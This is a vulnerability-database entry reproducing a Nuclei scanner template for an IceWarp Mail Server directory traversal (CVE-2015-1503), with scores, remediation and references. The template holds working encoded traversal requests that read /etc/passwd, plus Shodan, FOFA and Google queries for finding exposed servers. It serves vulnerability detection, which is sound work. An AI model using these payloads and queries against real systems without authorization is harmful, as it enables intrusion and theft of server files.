Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-1503
HistoryNov 24, 2021 - 1:31 p.m.

IceWarp Mail Server <11.1.1 - Directory Traversal

2021-11-2413:31:51
ProjectDiscovery
github.com
13
cve
lfi
mail
packetstorm
icewarp
security
exploit
vulnerability
access
upgrade

CVSS2

7.8

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.904

Percentile

98.8%

IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.

id: CVE-2015-1503

info:
  name: IceWarp Mail Server <11.1.1 - Directory Traversal
  author: 0x_Akoko
  severity: high
  description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.
  impact: |
    An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
  remediation: |
    Upgrade IceWarp Mail Server to version 11.1.1 or above to mitigate the directory traversal vulnerability.
  reference:
    - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html
    - http://www.icewarp.com
    - https://nvd.nist.gov/vuln/detail/CVE-2015-1503
    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-1503
    cwe-id: CWE-22
    epss-score: 0.90421
    epss-percentile: 0.98743
    cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: icewarp
    product: mail_server
    shodan-query:
      - title:"icewarp"
      - http.title:"icewarp server administration"
      - http.title:"icewarp"
      - cpe:"cpe:2.3:a:icewarp:mail_server"
    fofa-query:
      - title="icewarp server administration"
      - title="icewarp"
    google-query:
      - intitle:"icewarp server administration"
      - intitle:"icewarp"
      - powered by icewarp 10.4.4
  tags: cve2015,cve,lfi,mail,packetstorm,icewarp

http:
  - method: GET
    path:
      - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"
      - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f1b6cec92cc5cca66731a816986ddb746c97d46d6d9802824e3eba996852035702204cc6020916fea497fc2e85561d5acf00eeaede0d281dc4786316293e45cc00c8:922c64590222798bb761d5b6d8e72950

CVSS2

7.8

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.904

Percentile

98.8%